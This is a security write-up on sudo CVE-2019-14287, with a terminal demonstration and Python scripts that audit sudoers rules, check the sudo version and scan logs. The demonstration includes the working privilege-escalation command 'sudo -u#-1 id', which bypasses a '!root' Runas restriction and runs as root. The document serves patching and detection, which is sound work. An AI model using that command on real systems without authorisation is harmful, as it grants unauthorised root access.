Sudo Vulnerability (CVE-2019-14287) Worked Example

Background

A vulnerability affecting versions of sudo prior to 1.8.28 has been resolved. It allows a user whose sudo privileges restrict root access within the Runas specification to circumvent that restriction and execute commands as root, provided the “ALL” keyword comes first in the Runas specification. This is achieved by specifying the user ID -1 or 4294967295.

The impact of this vulnerability depends on your usage of the /etc/sudoers file. In environments that do not utilise sudo it will present minimal risk; in others it may present a significant risk. To be safe, it is recommended that you update your version of sudo to at least version 1.8.28.

There is a full write-up of this issue here: https://www.sudo.ws/alerts/minus_1_uid.html

Worked Example

Sudo Overview

The syntax used in the /etc/sudoers file is as follows:

user     host = (user)  command

The first column defines the user or group the entry applies to; the host and (user) sections define the hosts the entry applies to and the users the command may be run as. Finally, the command field specifies the command. The following entry is commonly seen in Debian /etc/sudoers files; it allows members of the admin group to run all commands as all users on all hosts:

%admin ALL=(ALL) ALL

Unless the “NOPASSWD” option is set, this will prompt the user for their password. Where this issue becomes interesting is when the /etc/sudoers entry contains “!root”, because this vulnerability can be used to circumvent that control.
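The following is an added example, not code from the original write-up, that applies the sudoers syntax described above from the auditing side: it parses user-specification lines, extracts the Runas user list, and flags any rule whose Runas list grants ALL and then excludes root, which is the shape this issue bypasses. The sudoers content is a constructed sample (the "test" rule is the one used later in this write-up); the parser handles the common user/host/Runas/command layout and skips Defaults and alias lines rather than implementing the full sudoers grammar.

```python
import re

# Added example (not from the original write-up): audit /etc/sudoers-style
# user specifications for the Runas shape that CVE-2019-14287 bypasses,
# i.e. a Runas user list that grants ALL and then excludes root. All input
# below is constructed sample data, not a real sudoers file.

# '#' starts a comment unless it introduces a numeric uid/gid such as #0 or #-1.
COMMENT_RE = re.compile(r'(^|\s)#(?!-?\d).*$')
# user  host = (runas_users[:runas_groups]) [tags:] command
LINE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\))?\s*(?P<cmd>.+)$'
)
NON_RULE_PREFIXES = ('Defaults', 'User_Alias', 'Host_Alias', 'Runas_Alias', 'Cmnd_Alias')
ROOT_EXCLUSIONS = {'!root', '!#0'}


def parse_sudoers_line(line):
    """Return (user, host, runas_users, command) for a user-specification line,
    or None for blank lines, comments, Defaults and alias definitions.
    runas_users is None when no Runas list is given (sudo then assumes root)."""
    line = COMMENT_RE.sub('', line).strip()
    if not line or line.startswith(NON_RULE_PREFIXES):
        return None
    m = LINE_RE.match(line)
    if not m:
        return None
    runas = m.group('runas')
    if runas is not None:
        runas = runas.split(':', 1)[0].strip()   # keep the user list, drop the group list
    return m.group('user'), m.group('host'), runas, m.group('cmd').strip()


def runas_bypassable(runas_users):
    """True when the Runas user list names ALL and a later entry excludes root.
    That is the configuration the write-up describes: sudo < 1.8.28 accepts
    uid -1 / 4294967295 because it is not root by name, yet the command ends
    up running as uid 0. A list such as (!root, ALL) is not flagged: the later
    ALL already permits root, so it is a permissive rule, not a bypass."""
    if runas_users is None:
        return False
    entries = [e.strip() for e in runas_users.split(',') if e.strip()]
    all_seen = False
    for entry in entries:
        if entry == 'ALL':
            all_seen = True
        elif entry in ROOT_EXCLUSIONS and all_seen:
            return True
    return False


def audit_sudoers(text):
    """Scan sudoers text and return one finding per rule whose Runas list has
    the bypassable shape."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        parsed = parse_sudoers_line(raw)
        if parsed is None:
            continue
        user, host, runas, command = parsed
        if runas_bypassable(runas):
            findings.append({'line': lineno, 'user': user, 'host': host,
                             'runas': runas, 'command': command})
    return findings


# Constructed sample sudoers content (not a real file); the 'test' rule is
# the one from the write-up.
SAMPLE_SUDOERS = "\n".join([
    "# constructed sample sudoers",
    "Defaults env_reset",
    "%admin ALL=(ALL) ALL",
    "test ALL=(ALL, !root) /usr/bin/id",
    "deploy ALL=(ALL, !root : ALL) NOPASSWD: /usr/bin/systemctl restart app",
    "ops ALL=(www-data) /usr/bin/ls",
    "backup ALL=(!root, ALL) /usr/bin/rsync",
])

if __name__ == '__main__':
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['user']} may run {f['command']} as root "
              f"via uid -1 on sudo < 1.8.28 (Runas: ({f['runas']}))")
```

Run against the constructed sample, the "test" and "deploy" rules are reported and "%admin ALL=(ALL) ALL" is not: that rule already permits root, so there is nothing for the bug to bypass. A real audit would feed in /etc/sudoers and the files under /etc/sudoers.d, and any rule reported should be rewritten to list the permitted Runas users explicitly rather than relying on "!root" to exclude one of them.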

Example

In this example we have the following entry in our /etc/sudoers file, which should allow us to run the /usr/bin/id command as any user except root and will require our user password in order to do so:

test ALL=(ALL, !root) /usr/bin/id

Initially running “id” without sudo gives the following output:

$ id
uid=1001(test) gid=1001(test) groups=1001(test)

When specifying a user ID other than our own, we are prompted for our password and the command executes, all as expected:

$ sudo -u#1000 id
[sudo] password for test: 
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)

When attempting to run this command as root, the following error is returned as a result of the “!root” specification in the /etc/sudoers file:

$ sudo id
Sorry, user test is not allowed to execute '/bin/id' as root on testsystem.

However, by specifying the user ID -1 we are able to circumvent this control and execute this command as root:

$ sudo -u#-1 id
uid=0(root) gid=1001(test) groups=1001(test)

This example was run on a Red Hat system with the following version information:

$ sudo --version
Sudo version 1.8.19p2
Sudoers policy plugin version 1.8.19p2
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.19p2

$ cat /etc/redhat-release 
Red Hat Enterprise Linux Server release 7.4 (Maipo)

$ uname -a
Linux lsfmaster 3.10.0-693.11.6.el7.x86_64 #1 SMP Thu Dec 28 14:23:39 EST 2017 x86_64 x86_64 x86_64 GNU/Linux
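The following is an added example, not part of the original write-up, covering two checks a defender can make from the information shown in this section: parsing "sudo --version" output and comparing it with the fixed release 1.8.28, and scanning sudo's syslog entries for commands whose target user was recorded as uid -1 or 4294967295, the trace this bypass leaves in the log. The version output is the one printed above; the log lines are constructed samples, and their "USER=... ; COMMAND=..." layout is an assumption based on sudo's usual syslog format.

```python
import re

# Added example (not from the original write-up): (1) parse `sudo --version`
# output and compare with the fixed release 1.8.28; (2) scan sudo's syslog
# lines for commands whose target user was recorded as uid -1 / 4294967295.
# The log line format is an assumption based on sudo's usual
# "USER=... ; COMMAND=..." syslog layout; the log lines are constructed.

FIXED_VERSION = (1, 8, 28)
VERSION_RE = re.compile(r'^Sudo version (\d+)\.(\d+)\.(\d+)', re.MULTILINE)

# sudo's syslog entry: "<user> : [reason ;] TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_LOG_RE = re.compile(
    r'sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$'
)
# Target users that only a -1 / 4294967295 uid run would produce.
SUSPICIOUS_TARGETS = {'#-1', '#4294967295'}


def parse_sudo_version(output):
    """Return (major, minor, patch) from `sudo --version` output; the 'pN'
    patch-level suffix is ignored because the fix landed in a full release."""
    m = VERSION_RE.search(output)
    if m is None:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(part) for part in m.groups())


def version_is_affected(output):
    """True when the upstream version is older than 1.8.28. Distribution
    packages that backport the fix keep an older version string, so treat a
    True here as 'check the package changelog', not as proof."""
    return parse_sudo_version(output) < FIXED_VERSION


def find_minus_one_runs(log_lines):
    """Return (invoking_user, target, command) for each sudo log line whose
    target user is the -1 / 4294967295 uid."""
    hits = []
    for line in log_lines:
        m = SUDO_LOG_RE.search(line)
        if m and m.group('target') in SUSPICIOUS_TARGETS:
            hits.append((m.group('user'), m.group('target'), m.group('cmd').strip()))
    return hits


# Version output as shown in the write-up.
SAMPLE_VERSION_OUTPUT = """Sudo version 1.8.19p2
Sudoers policy plugin version 1.8.19p2
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.19p2
"""

# Constructed syslog sample: a normal -u run, a denied root run, and two
# runs that targeted uid -1 / 4294967295.
SAMPLE_LOG = [
    "Oct 14 10:05:23 testsystem sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=ec2-user ; COMMAND=/usr/bin/id",
    "Oct 14 10:05:41 testsystem sudo:     test : command not allowed ; TTY=pts/0 ; PWD=/home/test ; USER=root ; COMMAND=/usr/bin/id",
    "Oct 14 10:06:02 testsystem sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=#-1 ; COMMAND=/usr/bin/id",
    "Oct 14 10:06:30 testsystem sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=#4294967295 ; COMMAND=/usr/bin/id",
]

if __name__ == '__main__':
    version = ".".join(map(str, parse_sudo_version(SAMPLE_VERSION_OUTPUT)))
    print("sudo version", version, "affected:", version_is_affected(SAMPLE_VERSION_OUTPUT))
    for user, target, cmd in find_minus_one_runs(SAMPLE_LOG):
        print(f"{user} ran {cmd} with target user {target}")
```

The version check is a first pass only: on Red Hat and Debian systems the fix is typically backported into a package whose version string stays below 1.8.28, so confirm with the package changelog (for example "rpm -q --changelog sudo | grep CVE-2019-14287" on Red Hat) before concluding a host is exposed. The log check is the more reliable signal after the fact, since a legitimate "-u" invocation resolves to a named user or a real uid, never to -1 or 4294967295.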